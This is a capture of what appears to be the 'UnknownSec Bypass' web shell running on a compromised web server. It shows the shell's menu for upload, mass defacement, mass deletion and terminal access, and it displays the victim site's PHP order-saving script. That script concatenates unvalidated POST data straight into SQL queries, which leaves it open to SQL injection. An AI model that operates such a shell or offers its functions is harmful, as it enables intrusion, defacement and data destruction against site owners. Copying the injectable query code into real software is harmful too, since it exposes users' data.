UnknownSec Bypass
403
:
/
var
/
www
/
html
/
clientpnl
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
save_manageorder.php
<?php session_start(); $regisid1=$_SESSION["regisid"]; $canteenname=$_SESSION['usercanteenname']; require_once "../config.php"; require_once "../conclass.php"; $cnt=0; $query= "select * from bookingtb where regisid='".$regisid1."' and isdeleted='0' and orderstatus=0 order by bookingdatetime DESC limit 1"; $result = mysqli_query($conn, $query); $cnt = mysqli_num_rows($result); if( $cnt>0) { $tokenno=0; $query= "select newtokenno as newtokenno from bookingqry where regisid='".$regisid1."' and isdeleted='0' order by bookingdatetime DESC limit 1"; $result = mysqli_query($conn, $query); while($row = mysqli_fetch_array($result)) { $tokenno = intval($row["newtokenno"]); } $message=0; $creationdatetime = date("Y-m-d H:m:s"); $orderdate = date("Y-m-d"); $data = (array)json_decode($_POST['userdata'],true); $orderno=0; $query= "select max(orderno) as orderno from ordertb where isdeleted='0'"; $result = mysqli_query($conn, $query); while($row = mysqli_fetch_array($result)) { $orderno = intval($row["orderno"])+1; } foreach ($data as $k=>$v){ $query="insert into ordertb(orderno,tokenno,orderdate,productname,qty,userid,canteenname,isdeleted,creationdatetime) values('". $orderno."','".$tokenno ."','".$orderdate."','".$v["name"]."','".$v["qty"]."','".$regisid1."','".$canteenname."',0,'".$creationdatetime."')"; $result = mysqli_query($conn, $query); if($result==1) $message=1; } if($message==1) { $query="update bookingtb set orderstatus=1 where RegisID='".$regisid1."'"; $result = mysqli_query($conn, $query); } } else { $message=2; } echo json_encode($message); ?>
Copyright © 2025 - UnknownSec